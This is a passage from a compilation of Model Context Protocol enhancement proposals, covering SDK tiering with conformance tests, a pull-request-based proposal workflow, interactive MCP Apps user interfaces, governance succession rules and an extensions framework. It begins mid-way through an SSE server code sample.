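  // JSON-RPC response can be delivered on a later reconnection via Last-Event-ID.
  res.end();
}).listen(3000);
```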
## Rationale
Servers may disconnect at will, avoiding long-running connections. Sending a `retry` field will prevent the client from hammering the server with inappropriate reconnection attempts.
## Backward Compatibility
* **New Client + Old Server**: No changes. No backward incompatibility.
* **Old Client + New Server**: Client should interpret an at-will disconnect the same as a network failure. `retry` field is part of the SSE standard. No backward incompatibility if client already implements proper SSE resuming logic.
## Additional Information
This SEP supersedes (in part) [SEP-1335](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1335).
# SEP-1730: SDKs Tiering System
Source: https://modelcontextprotocol.io/community/seps/1730-sdks-tiering-system
SDKs Tiering System
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1730 |
| **Title** | SDKs Tiering System |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-29 |
| **Author(s)** | Inna Harper, Felix Weinberger |
| **Sponsor** | None |
| **PR** | [#1730](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1730) |
***
## Abstract
This SEP proposes a tiering system for Model Context Protocol (MCP) SDKs to establish clear expectations for feature support, maintenance commitments, and quality standards. The system defines three tiers of SDK support with objective, measurable criteria for classification.
## Motivation
The MCP ecosystem needs SDK harmonization to help users make informed decisions. Users currently face challenges:
* **Feature Support Uncertainty**: No standardized way to know which SDKs support specific MCP features (e.g., OAuth, client/server/system features such as sampling, transports)
* **Maintenance Expectations**: Unclear commitment levels for bug fixes, security patches, and feature updates
* **Implementation Timelines**: No visibility into when SDKs will support new protocol versions and features
## Specification
### Tier Definitions
#### Tier 1: Fully supported
SDKs in this tier provide a full protocol implementation and are well supported.
**Requirements:**
* **Feature complete and full support of the protocol**
* All conformance tests pass
* New protocol features implemented before the new spec version release (there is a two-week window between the Release Candidate and the new protocol version release)
* **SDK maintenance**
* Acknowledge and triage issues within two business days
* Resolve security and critical bugs within seven days
* Stable release and SDK versioning clearly documented
* **Documentation**
* Comprehensive documentation with examples for all features
* Published dependency update policy
#### Tier 2: Commitment to be fully supported
SDKs with established implementations actively working toward full protocol support.
**Requirements:**
* **Feature complete and full support of the protocol**
* 80% of conformance tests pass
* New protocol features implemented within six months
* **SDK maintenance**
* Active issue tracking and management
* At least one stable release
* **Documentation**
* Basic documentation covering core features
* Published dependency update policy
* **Commitment to move to Tier 1**
* Published roadmap showing intent to achieve Tier 1 or, if the SDK will remain in Tier 2 indefinitely, a transparent roadmap about the direction of the SDK and the reasons for not being feature complete
#### Tier 3: Experimental
Early-stage or specialized SDKs exploring the protocol space.
**Characteristics:**
* No feature completeness guarantees
* No stable release requirement
* May focus on specific use cases or experimental features
* No timeline commitments for updates
* Suitable for niche implementations that may remain at this tier
### Conformance Testing
All SDKs must undergo conformance testing using protocol trace validation; for details, see the [Conformance Testing RFC (forthcoming)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1627). This SEP does not focus on conformance testing itself. For the initial version of tiering, we will use a simplified approach: an example server for each SDK, with simplified conformance tests run against it.
```mermaid theme={null}
sequenceDiagram
participant SDK
participant Test Suite
participant Validator
Test Suite->>SDK: Execute test scenario
SDK->>Test Suite: Protocol messages
Test Suite->>Validator: Submit trace
Validator->>Test Suite: Compliance report
Test Suite->>SDK: Pass/Fail result
```
**Compliance Scoring:**
* SDKs receive a percentage score based on test results
* Scores can be displayed as badges (e.g., "90% MCP Compliant")
* Tier 1: 100% compliance required
* Tier 2: 80% compliance required
* Tier 3: No minimum requirement
### Tier Advancement Process
1. **Self-Assessment:** Maintainers evaluate their SDK against tier criteria
2. **Application:** Submit tier advancement request with evidence
3. **Review:** Community review period (2 weeks)
4. **Validation:** Automated conformance testing and GitHub issue statistics
5. **Decision:** Tier assignment by MCP maintainers
### Tier Relegation Process
1. **Auto validation:**
1. Compliance tests continuously failing for four weeks (Tier 1)
2. More than 20% of compliance tests continuously failing for four weeks (Tier 2)
2. **Issues:**
1. Issues not addressed within two months
### Requirements matrix
| Feature | SDK A | SDK B | SDK C |
| :------------------------------------------------ | :------ | :------- | :----- |
| **Protocol Features support (Conformance tests)** | 85% | 60% | 100% |
| **GitHub support stats** | 10 days | 100 days | 5 days |
| **Documentation (self reported)** | Good | Minimal | Good |
| **Tier (computed from above)** | Tier 2 | Tier 3 | Tier 1 |
## Rationale
### Why Three Tiers?
* **Tier 1** ensures users have well supported, fully-featured SDK
* **Tier 2** provides a clear pathway for improving SDKs
* **Tier 3** allows experimentation without creating barriers to entry
### Why Time-Based Commitments?
While the community raised concerns about rigid timelines, they provide:
* Clear expectations for users
* Measurable goals for maintainers
* Flexibility through tier progression
### Why Not Just Feature Matrices?
Feature matrices alone don't communicate:
* Maintenance commitment
* Quality standards
* Support expectations
The tiering system combines feature support with quality guarantees.
## Alternatives Considered
### 1. Feature Matrix Only
**Rejected because:** Doesn't communicate maintenance commitments or quality standards
### 2. Percentage-Based Scoring
**Rejected because:** Too granular and doesn't capture qualitative aspects like support
### 3. Properties-Based System
**Rejected because:** Multiple overlapping properties could confuse users
### 4. Latest Version Listing Only
**Rejected because:** Simply listing "supports MCP date" fails to capture critical information:
* Version support may be incomplete (e.g., supports a given protocol version except OAuth)
* No indication of maintenance commitment or issue response times
* Lacks information about security patch timelines
* Doesn't communicate dependency update policies
* Version numbers alone don't indicate production readiness
### 5. No Formal System
**Rejected because:** Current ad-hoc approach creates uncertainty for users
## Backward Compatibility
This proposal introduces a new classification system with no breaking changes:
* Existing SDKs continue to function
* Classification is opt-in initially
* Grace period for existing SDKs to achieve tier status
## Security Implications
* Tier 1 SDKs must address security issues within 7 days
* All tiers encouraged to follow security best practices
* Conformance tests include security validation
## Implementation Plan
* [ ] Finalize simplified conformance test suite - Nov 4, 2025
* [ ] SDK maintainers self-assess and apply for tiers - Nov 14, 2025
* [ ] Initial tier assignments - before the November spec release
* [ ] Implement full compliance tests
* [ ] Implement automatic issue tracking analysis for SDKs
## Community Impact
### SDK Maintainers
* Clear goals for improvement
* Recognition for quality implementations
* Structured pathway for advancement
### SDK Users
* Informed selection of SDKs
* Clear expectations for support
* Confidence in tier 1 implementations
### Ecosystem
* Improved overall SDK quality
* Standardized feature support
* Healthy competition between implementations
## References
* [SDK Maintainer Meeting Notes (#1648)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1648)
* [SDK Harmonization Goals (#1444)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1444)
* [Conformance Testing SEP (DRAFT)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1627)
## Appendix
### Simplified conformance tests
While we are working on a [comprehensive proposal for conformance testing](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1627), which will take some time to implement, we want to move forward with at least some automated way to check whether an SDK has a full feature set. We will start with the server feature set, as we have many more servers than clients and the vast majority of developers using SDKs are server implementers.
The most straightforward approach is to have an Example Server for each SDK, similar to the [Everything Server](https://github.com/modelcontextprotocol/servers/tree/main/src/everything). Then we will have a Conformance Test Client with all the test cases we want to be able to test, for example:
* Execute the “hello world” tool
* Get prompt
* Get completion
* Get resource template
* Receive notifications
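As an illustration, a check for the first test case might look like this sketch (the `connectClient` helper and its shape are hypothetical):
```typescript theme={null}
declare function connectClient(serverCommand: string): Promise<{
  callTool(name: string, args: object): Promise<{ content: Array<{ type: string; text?: string }> }>;
  close(): Promise<void>;
}>;

// Test case: execute the "say_hello" tool and verify it returns simple text.
async function testSayHello(serverCommand: string): Promise<boolean> {
  const client = await connectClient(serverCommand);
  try {
    const result = await client.callTool("say_hello", {});
    const first = result.content[0];
    return first?.type === "text" && typeof first.text === "string";
  } finally {
    await client.close();
  }
}
```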
**What is needed from SDK maintainers:** implement an everything server based on a spec. The spec will look like:
* Tool “say\_hello” to return simple text
* Tool “show\_image” to return an image
* Tool “tool\_with\_logging” to return structured output in a format \<> and log three events: start, process, end
* Tool "tool\_with\_notifications" to return structured output in a format \<> and have two notifications \<>
Given a well-defined spec for the server and the SDK documentation, it should be easy to implement with the help of any coding agent. We want to check it into each SDK's repo, as it will serve as an example for server implementers.
Once each SDK has an Everything server, we will run the Conformance Test Client against it.
# SEP-1850: PR-Based SEP Workflow
Source: https://modelcontextprotocol.io/community/seps/1850-pr-based-sep-workflow
PR-Based SEP Workflow
| Field | Value |
| ------------- | ------------------------------------------------------------------------------------------------------------------ |
| **SEP** | 1850 |
| **Title** | PR-Based SEP Workflow |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-11-20 |
| **Accepted** | 2025-11-28, 8 Yes, 0 No, 0 Absent per vote in Discord. |
| **Author(s)** | Nick Cooper ([@nickcoai](https://github.com/nickcoai)), David Soria Parra ([@davidsp](https://github.com/davidsp)) |
| **Sponsor** | David Soria Parra ([@davidsp](https://github.com/davidsp)) |
| **PR** | [#1850](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1850) |
***
## Abstract
This SEP formalizes the pull request-based SEP workflow that stores proposals as markdown files in the `seps/` directory of the Model Context Protocol specification repository. The workflow assigns SEP numbers from pull request numbers, maintains version history in Git, and replaces the previous GitHub Issues-based process. This establishes a file-based approach as the canonical way to author, review, and accept SEPs.
## Motivation
The issue-based SEP process introduced several challenges:
* **Dispersed content**: Proposal content was scattered across GitHub issues, linked documents, and pull requests, making review and archival difficult.
* **Difficult collaboration**: Maintaining long-form specifications in issue bodies made iterative edits and multi-contributor collaboration harder.
* **Limited version control**: GitHub issues don't provide the same version control capabilities as Git-managed files.
* **Unclear status management**: The process lacked clear mechanisms for tracking status transitions and ensuring consistency between different sources of truth.
A file-based workflow addresses these issues by:
* Keeping every SEP in version control alongside the specification itself
* Providing Git's built-in review tooling, history, and searchability
* Linking SEP numbers to pull requests to eliminate manual bookkeeping
* Surfacing all discussion in the pull request thread
* Using PR labels in conjunction with file status for better discoverability
## Specification
### 1. Canonical Location
* Every SEP lives in `seps/{NUMBER}-{slug}.md` in the specification repository
* The SEP number is always the pull request number that introduces the SEP file
* The `seps/` directory serves as the single source of truth for all SEPs
### 2. Author Workflow
1. **Draft the proposal** in `seps/0000-{slug}.md` using `0000` as a placeholder number
2. **Open a pull request** containing the draft SEP and any supporting materials
3. **Request a sponsor** from the Maintainers list; tag potential sponsors from [MAINTAINERS.md](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md)
4. **After the PR number is known**, amend the commit to rename the file to `{PR-number}-{slug}.md` and update the header (`SEP-{PR-number}` and `PR: #{PR-number}`)
5. **Wait for sponsor assignment**: Once a sponsor agrees, they will assign themselves and update the status to `Draft`
### 3. Sponsor Responsibilities
A Sponsor is a Core Maintainer or Maintainer who champions the SEP through the review process. The sponsor's responsibilities include:
* **Reviewing the proposal** and providing constructive feedback
* **Requesting changes** based on community input
* **Managing status transitions** by:
* Ensuring that the `Status` field in the SEP markdown file is accurate
* Applying matching PR labels to keep them in sync with the file status
* Communicating status changes via PR comments
* **Initiating formal review** when the SEP is ready (moving from `Draft` to `In-Review`)
* **Raising to Core Maintainers** by ensuring the SEP is presented at the Core Maintainer meeting and that the author and sponsor present it
* **Ensuring quality standards** are met before advancing the proposal
* **Tracking implementation** progress and ensuring reference implementations are complete before `Final` status
### 4. Review Flow
Status progression follows: `Draft → In-Review → Accepted → Final`
Additional terminal states: `Rejected`, `Withdrawn`, `Superseded`, `Dormant`
**Dormant status**: If a SEP does not find a sponsor within six months, Core Maintainers may close the PR and mark the SEP as `dormant`.
Reference implementations must be tracked via linked pull requests or issues and must be complete before marking a SEP as `Final`.
### 5. Documentation
* `docs/community/sep-guidelines.mdx` serves as the contributor-facing instructions
* `seps/README.md` provides the concise reference for formatting, naming, sponsor responsibilities, and acceptance criteria
* Both documents must reflect this workflow and be kept in sync
### 6. SEP File Structure
Each SEP must include:
```markdown theme={null}
# SEP-{NUMBER}: {Title}
- **Status**: Draft | In-Review | Accepted | Rejected | Withdrawn | Final | Superseded | Dormant
- **Type**: Standards Track | Informational | Process
- **Created**: YYYY-MM-DD
- **Author(s)**: Name (@github-username)
- **Sponsor**: @github-username (or "None" if seeking sponsor)
- **PR**: https://github.com/modelcontextprotocol/specification/pull/{NUMBER}
## Abstract
## Motivation
## Specification
## Rationale
## Backward Compatibility
## Security Implications
## Reference Implementation
```
### 7. Status Management via PR Labels
To improve discoverability and filtering:
* Sponsors must apply PR labels that match the SEP status (`draft`, `in-review`, `accepted`, `final`, etc.)
* Both the markdown `Status` field and PR labels should be kept in sync
* The markdown file serves as the canonical record (versioned with the proposal)
* PR labels enable easy filtering and searching for SEPs by status
* Only sponsors should modify status fields and labels; authors should request changes through their sponsor
### 8. Legacy Considerations
* Contributors may optionally open a GitHub Issue for early discussion, but the authoritative SEP text lives in `seps/`
* Issues should link to the relevant file once a pull request exists
* SEP numbers are derived from PR numbers, not issue numbers
## Rationale
### Why File-Based?
Storing SEPs as files keeps authoritative specs versioned with the code, mirroring successful processes used by PEPs (Python Enhancement Proposals) and other standards bodies. This approach:
* Provides built-in version control via Git
* Enables standard code review workflows
* Maintains clear history of all changes
* Supports multi-contributor collaboration
* Integrates naturally with the specification repository
### Why PR Numbers?
Using pull request numbers:
* Eliminates race conditions around manual numbering
* Creates natural traceability between proposal and discussion
* Prevents number conflicts
* Simplifies the contribution process
* Maintains a single discussion thread for review
### Why PR Labels?
Adding PR labels alongside the file status:
* Enables quick filtering of SEPs by status without opening files
* Provides immediate visibility of SEP states in PR lists
* Supports GitHub's search and filter capabilities
* Complements the canonical markdown status field
* Reduces friction for maintainers managing multiple SEPs
### Making This the Primary Process
Maintaining two overlapping canonical processes risked divergence and created confusion for contributors. Establishing the file-based approach as the primary method:
* Reduces cognitive overhead for new contributors
* Ensures consistency in the SEP corpus
* Simplifies maintenance for sponsors
* Aligns with industry best practices
## Backward Compatibility
* Existing issue-based SEPs remain valid and require no migration
* Historical GitHub Issue links continue to work
* Future SEPs should reference the new file locations in `seps/`
* Maintainers may optionally backfill historical SEPs into `seps/` for archival purposes
## Security Implications
No new security considerations beyond the standard code review process for pull requests.
## Reference Implementation
* This pull request (#1850) implements the canonical instructions in both `seps/README.md` and `docs/community/sep-guidelines.mdx`
* The process has been updated to reflect the PR-based workflow with status management via labels
* This SEP document itself serves as an example of the new format
## Vote
This SEP was accepted unanimously by the MCP Core Maintainers with a vote of 8 yes, 0 no, and 0 absent on Friday, November 28, 2025, in a Discord poll.
# SEP-1865: MCP Apps - Interactive User Interfaces for MCP
Source: https://modelcontextprotocol.io/community/seps/1865-mcp-apps-interactive-user-interfaces-for-mcp
MCP Apps - Interactive User Interfaces for MCP
Final
Extensions Track
| Field | Value |
| ------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **SEP** | 1865 |
| **Title** | MCP Apps - Interactive User Interfaces for MCP |
| **Status** | Final |
| **Type** | Extensions Track |
| **Created** | 2025-11-21 |
| **Author(s)** | Ido Salomon ([@idosal](https://github.com/idosal)), Liad Yosef ([@liadyosef](https://github.com/liadyosef)), Olivier Chafik ([@olivierchafik](https://github.com/olivierchafik)) |
| **Sponsor** | None (seeking sponsor) |
| **PR** | [#1865](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1865) |
***
## Abstract
This SEP proposes an extension to MCP (per SEP-1724) that enables servers to deliver interactive
user interfaces to hosts. MCP Apps introduces a standardized pattern for declaring UI resources via
the `ui://` URI scheme, associating them with tools through metadata, and facilitating
bi-directional communication between the UI and the host using MCP's JSON-RPC base protocol. This
extension addresses the growing community need for rich, interactive experiences in MCP-enabled
applications, maintaining security, auditability, and alignment with MCP's core architecture. The
initial specification focuses on HTML resources (`text/html;profile=mcp-app`) with a clear path for
future extensions.
## Motivation
MCP lacks a standardized way for servers to deliver rich, interactive user interfaces to hosts.
This gap blocks many use cases that require visual presentation and interactivity that go beyond
plain text or structured data. As more hosts adopt this capability, the risk of fragmentation and
interoperability challenges grows.
[MCP-UI](https://mcpui.dev/) has demonstrated the viability and value of MCP apps built on UI
resources and serves as a community playground for the UI spec and SDK. Fueled by a dedicated
community, it developed the bi-directional communication model and the HTML, external URL, and
remote DOM content types. MCP-UI's adopters, including hosts and providers such as Postman,
HuggingFace, Shopify, Goose, and ElevenLabs, have provided critical insights and contributions to
the community.
OpenAI's [Apps SDK](https://developers.openai.com/apps-sdk/), launched in November 2025, further
validated the demand for rich UI experiences within conversational AI interfaces. The Apps SDK
enables developers to build rich, interactive applications inside ChatGPT using MCP as its
backbone.
The architecture of both the Apps SDK and MCP-UI has significantly informed the design of this
specification.
However, without formal standardization:
* Servers cannot reliably expect UI support via MCP
* Each host may implement slightly different behaviors
* Security and auditability patterns are inconsistent
* Developers must maintain separate implementations or adapters for different hosts (e.g., MCP-UI
vs. Apps SDK)
This SEP addresses the current limitations through an optional, backwards-compatible extension that
unifies the approaches pioneered by MCP-UI and the Apps SDK into a single, open standard.
## Specification
The full specification can be found at
[modelcontextprotocol/ext-apps](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx).
At a high level, MCP Apps extends the Model Context Protocol to enable servers to deliver
interactive user interfaces to hosts. This extension introduces:
* **UI Resources:** Predeclared resources using the `ui://` URI scheme
* **Resource Discovery:** Tools reference UI resources via metadata
* **Bi-directional Communication:** UI iframes communicate with hosts using standard MCP JSON-RPC
protocol
* **Security Model:** Mandatory iframe sandboxing with auditable communication
This specification focuses on HTML content (`text/html;profile=mcp-app`) as the initial content
type, with extensibility for future formats.
As an extension, MCP Apps is optional and must be explicitly negotiated between clients and servers
through the extension capabilities mechanism (see Capability Negotiation section in the
[full specification](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx)).
## Rationale
### Predeclared resources vs. inline embedding
UI is modeled as predeclared resources (`ui://`), referenced by tools via metadata. This allows:
* Hosts to prefetch templates before tool execution, improving performance
* Separation of presentation (template) from data (tool results), facilitating caching
* Security review of UI resources
**Alternatives considered:**
* **Embedded resources:** Current MCP-UI approach, where resources are returned in tool results.
Although it's more convenient for server development, it was deferred due to the gaps in
performance optimization and the challenges in the UI review process.
* **Resource links:** Predeclare the resources but return links in tool results. Deferred due to
the gaps in performance optimization.
### Reusing MCP JSON-RPC instead of a custom protocol
Reuses existing MCP infrastructure (type definitions, SDKs, etc.). JSON-RPC offers advanced
capabilities (timeouts, errors, etc.).
**Alternatives considered:**
* **Custom message protocol:** Current MCP-UI approach with message types like tool, intent,
prompt, etc. These message types can be translated to a subset of the proposed JSON-RPC messages.
* **Global API object:** Rejected because it requires host-specific injection and doesn't work with
external iframe sources. Syntactic sugar may still be added on the server/UI side.
### HTML-only MVP
* HTML is universally supported and well-understood
* Simplest security model (standard iframe sandbox)
* Allows screenshot/preview generation (e.g., via html2canvas)
* Sufficient for most observed use cases
* Provides a clear baseline for future extensions
**Alternatives considered:**
* **Include external URLs in MVP:** This is one of the easiest content types for servers to adopt,
as it's possible to embed regular apps. However, it was deferred due to concerns around model
visibility, inability to screenshot content, and review process. It may effectively be supported
with the SEP's new `externalIframes` capability.
## Backward Compatibility
The proposal is an optional extension to the core protocol. Existing implementations continue
working without changes.
## Security Implications
Hosting interactive UI content from potentially untrusted MCP servers requires careful security
consideration.
Based on the threat model, MCP Apps proposes the following mitigations:
* **Iframe sandboxing**: All UI content runs in sandboxed iframes with restricted permissions
* **Predeclared templates**: Hosts can review HTML content before rendering
* **Auditable messages**: All UI-to-host communication goes through loggable JSON-RPC
* **User consent**: Hosts can require explicit approval for UI-initiated tool calls
A full threat model analysis and mitigations are available in the
[full specification](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx).
## Reference Implementation
* [MCP-UI](https://github.com/idosal/mcp-ui) client and server SDKs support the patterns proposed
in this spec.
* [ext-apps](https://github.com/modelcontextprotocol/ext-apps) repository contains a prototype
implementation by Olivier Chafik.
# SEP-2085: Governance Succession and Amendment Procedures
Source: https://modelcontextprotocol.io/community/seps/2085-governance-succession-and-amendment
Governance Succession and Amendment Procedures
Final
Process
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 2085 |
| **Title** | Governance Succession and Amendment Procedures |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-12-05 |
| **Author(s)** | David Soria Parra ([@dsp-ant](https://github.com/dsp-ant)) |
| **Sponsor** | David Soria Parra ([@dsp-ant](https://github.com/dsp-ant)) |
| **PR** | [#2085](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/2085) |
***
## Abstract
This SEP establishes formal procedures for Lead Maintainer succession and governance amendment within the Model Context Protocol project. It defines clear processes for leadership transitions when a Lead Maintainer leaves their role and establishes requirements for proposing and approving changes to the governance structure itself.
## Motivation
The current MCP governance structure defines roles and responsibilities but lacks explicit procedures for two critical scenarios:
1. **Leadership Succession**: The governance document identifies Justin Spahr-Summers and David Soria Parra as Lead Maintainers (BDFLs) but does not specify what happens if one or both leave their roles. Without a defined succession process, an unexpected departure could create uncertainty about project leadership and decision-making authority.
2. **Governance Evolution**: As the MCP project grows and the community evolves, the governance structure may need to adapt. Currently, there is no defined process for how the governance document itself can be amended, which could lead to ad-hoc changes without proper community input or unclear authority for making such changes.
Establishing these procedures now, while the project leadership is stable, ensures continuity and provides clear guidance for future scenarios.
## Specification
The following sections shall be added to the MCP Governance document.
### Succession
If a Lead Maintainer leaves their role for any reason, the succession process begins upon their written notice or, if unable to provide notice, upon a determination by the remaining Lead Maintainer(s) or Core Maintainers that the Lead Maintainer is unable to continue serving.
If one or more Lead Maintainer(s) remain, they shall appoint a successor (by majority vote if multiple), and the remaining Lead Maintainer(s) will continue to govern until a successor is appointed.
If no Lead Maintainers remain, the Core Maintainers shall appoint a successor by majority vote within 30 days, and the project operates by two-thirds vote of Core Maintainers until a new Lead Maintainer is appointed.
### Amendment
Amendments to this governance structure may only be proposed by Lead Maintainers. Any proposed amendment must be approved by a two-thirds (2/3) majority of all Core Maintainers to take effect.
Amendment proposals shall:
1. Be submitted in writing with clear rationale for the proposed change
2. Include specific language describing the modification to existing governance provisions
3. Allow for a minimum comment period of five (5) days before voting
4. Be decided by recorded vote of Core Maintainers
## Rationale
### Succession Process Design
The succession process is designed with several principles in mind:
* **Continuity**: Remaining Lead Maintainers can continue operating and appoint successors without disruption to project governance.
* **Fallback Authority**: If all Lead Maintainers depart, Core Maintainers have clear authority to select new leadership, preventing a governance vacuum.
* **Time-Bound Process**: The 30-day requirement ensures succession happens promptly while allowing adequate time for deliberation.
* **Supermajority Interim Governance**: Two-thirds voting during interregnum periods ensures major decisions have broad support during transitional periods.
### Amendment Process Design
The amendment process balances stability with adaptability:
* **Lead Maintainer Proposal Authority**: Limiting proposal authority to Lead Maintainers prevents governance churn from frequent amendment proposals while ensuring those with deepest project investment can drive necessary changes.
* **Core Maintainer Approval**: Requiring two-thirds Core Maintainer approval ensures amendments have broad support from those actively governing the project.
* **Comment Period**: The five-day minimum comment period allows affected parties to review and provide input before voting.
* **Recorded Votes**: Transparency in voting ensures accountability and provides a historical record of governance decisions.
### Alternatives Considered
**Succession by Election**: An open election process was considered but rejected as potentially disruptive and slow during critical transition periods. The current proposal allows for quick succession while maintaining checks through the existing maintainer structure.
**Amendment by Any Maintainer**: Allowing any maintainer to propose amendments was considered but could lead to governance instability. The current approach balances stability with the ability to evolve.
**Longer Comment Periods**: Longer comment periods (e.g., 30 days) were considered but deemed excessive for a project that already has regular bi-weekly Core Maintainer meetings. Five days allows for at least one meeting cycle while enabling timely decisions.
## Backward Compatibility
This SEP adds new procedures without modifying existing governance structures. No backward compatibility concerns exist.
## Security Implications
This SEP has no direct security implications. However, clear succession procedures indirectly support security by ensuring continuous responsible stewardship of the project, including security-related decisions.
## Reference Implementation
Upon acceptance, this SEP will be implemented by adding the Succession and Amendment sections to `docs/community/governance.mdx`. The new sections will be inserted after the "Lead Maintainers (BDFL)" section and before the "Decision Process" section.
A draft pull request implementing these changes will be linked here once available.
# SEP-2133: Extensions
Source: https://modelcontextprotocol.io/community/seps/2133-extensions
Extensions
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 2133 |
| **Title** | Extensions |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-01-21 |
| **Author(s)** | Peter Alexander ([@pja-ant](https://github.com/pja-ant)) |
| **Sponsor** | None (seeking sponsor) |
| **PR** | [#2133](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/2133) |
***
## Abstract
This SEP establishes a lightweight framework for extending the Model Context Protocol through optional, composable extensions. This proposal defines a governance model and presentation structure for extensions that allows the MCP ecosystem to evolve while maintaining core protocol stability. Extensions enable experimentation with new capabilities without forcing adoption across all implementations, providing clear extension points for the community to propose, review, and adopt enhanced functionality.
This SEP defines both official extensions (maintained by MCP maintainers) and experimental extensions (an incubation pathway for Working Groups and Interest Groups to prototype and collaborate on extension ideas before formal acceptance). Externally maintained extensions will likely come at a later stage.
## Motivation
MCP currently lacks any form of guidance on how extensions are to be proposed or adopted. Without a process, it is unclear how these extensions are governed, what expectations there are around implementation, how they should be referenced in the specification, etc.
## Specification
### Definition
An MCP extension is an optional addition to the specification that defines capabilities beyond the core protocol. Extensions enable functionality that may be modular (e.g., distinct features like authentication), specialized (e.g., industry-specific logic), or experimental (e.g., features being incubated for potential core inclusion).
Extensions are identified using a unique *extension identifier* with the format: `{vendor-prefix}/{extension-name}`, e.g. `io.modelcontextprotocol/oauth-client-credentials` or `com.example/websocket-transport`. The names follow the same rules as the [\_meta keys](https://modelcontextprotocol.io/specification/draft/basic/index#meta), except that the prefix is mandatory.
To prevent identifier collisions, the vendor prefix SHOULD be a reversed domain name that the extension author owns or controls (similar to Java package naming conventions). For example, a company owning `example.com` would use `com.example/` as their prefix.
Breaking changes MUST use a new identifier, e.g. `io.modelcontextprotocol/oauth-client-credentials-v2`. A breaking change is any modification that would cause existing compliant implementations to fail or behave incorrectly, including: removing or renaming fields, changing field types, altering the semantics of existing behavior, or adding new required fields.
Extensions may have settings that are sent in client/server messages for fine-grained configuration.
This SEP defines *Official Extensions* and *Experimental Extensions*. Experimental extensions are maintained within the MCP organization as an incubation pathway but are not yet officially accepted. *Unofficial extensions* are not recognized by MCP governance and may be introduced and governed by developers outside the MCP organization.
### Official Extensions
Official extensions live inside the MCP github org at [https://github.com/modelcontextprotocol/](https://github.com/modelcontextprotocol/) and are officially developed and recommended by MCP maintainers. Official extensions use the `io.modelcontextprotocol` vendor prefix in their extension identifiers.
An *extension repository* is a repository within the official modelcontextprotocol github org with the `ext-` prefix, e.g. [https://github.com/modelcontextprotocol/ext-auth](https://github.com/modelcontextprotocol/ext-auth).
* Extension repositories are created at the core maintainers' discretion, with the purpose of grouping extensions in a specific area (e.g. auth, transport, financial services).
* A repository has a set of maintainers (identified by MAINTAINERS.md) appointed by the core maintainers that are responsible for the repository and extensions within it (e.g. [ext-auth MAINTAINERS.md](https://github.com/modelcontextprotocol/ext-auth/blob/main/MAINTAINERS.md), [ext-apps MAINTAINERS.md](https://github.com/modelcontextprotocol/ext-apps/blob/main/MAINTAINERS.md)).
* Extensions SHOULD have an associated working group or interest group to guide their development and gather community input.
An *extension* is a versioned specification document within an extension repository, e.g. [https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/oauth-client-credentials.mdx](https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/oauth-client-credentials.mdx)
* Extension specifications MUST use the same language as the core specification (i.e. \[[BCP 14](https://www.rfc-editor.org/info/bcp14)] \[[RFC2119](https://datatracker.ietf.org/doc/html/rfc2119)] \[[RFC8174](https://datatracker.ietf.org/doc/html/rfc8174)]) and SHOULD be worded as if they were part of the core specification.
While day-to-day governance is delegated to extension repository maintainers, the core maintainers retain ultimate authority over official extensions, including the ability to modify, deprecate, or remove any extension.
### Experimental Extensions
Experimental extensions provide an incubation pathway for Working Groups (WGs) and Interest Groups (IGs) to facilitate discovery, prototype ideas, and collaborate on extension concepts before formal SEP submission. Experimental extensions allow cross-company collaboration under neutral governance with clear anti-trust protection and IP clarity.
An *experimental extension repository* is a repository within the official modelcontextprotocol github org with the `experimental-ext-` prefix, e.g. `https://github.com/modelcontextprotocol/experimental-ext-interceptors`.
* Any maintainer MAY create an experimental extension repository while the associated SEP is still in draft state (or before a SEP has been submitted).
* Experimental extensions MUST be associated with a Working Group or Interest Group, whose maintainers are responsible for day-to-day governance of the repository.
* Experimental extension repositories MUST clearly indicate their experimental/non-official status (e.g., in the README) to avoid confusion with official extensions.
* Any published packages from experimental extensions MUST use naming that clearly indicates their experimental status.
* Core maintainers retain oversight of experimental extension repositories, including the ability to archive or remove them.
To graduate an experimental extension to official status, the standard SEP process (Extensions Track) applies. The experimental repository and any reference implementations developed during incubation MAY be referenced in the SEP to demonstrate the extension's practicality.
### Lifecycle
#### Creation
Extensions MAY optionally begin as experimental extensions (see *Experimental Extensions* section) to facilitate prototyping and collaboration before formal submission. This incubation period is encouraged but not required.
To become an official extension, extensions are created via a SEP in the [main MCP repository](https://github.com/modelcontextprotocol/modelcontextprotocol/) using the [standard SEP guidelines](https://modelcontextprotocol.io/community/sep-guidelines) but with a new type: **Extensions Track**. This type follows the same review and acceptance process as Standards Track SEPs, but clearly indicates that the proposal is for an extension rather than a core protocol addition. The SEP must identify the Working Group and Extension Maintainers that will be responsible for the extension. See [SEP-2148](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/2148) for how maintainers are appointed.
Extension SEPs:
* SHOULD be discussed and iterated on in a relevant working group prior to submission.
* MUST have at least one reference implementation in an official SDK prior to review to ensure the extension is practical and implementable.
* MAY reference an existing experimental extension repository and implementations developed during incubation.
* Will be reviewed by the Core Maintainers, who have the final authority over its inclusion as an Official Extension.
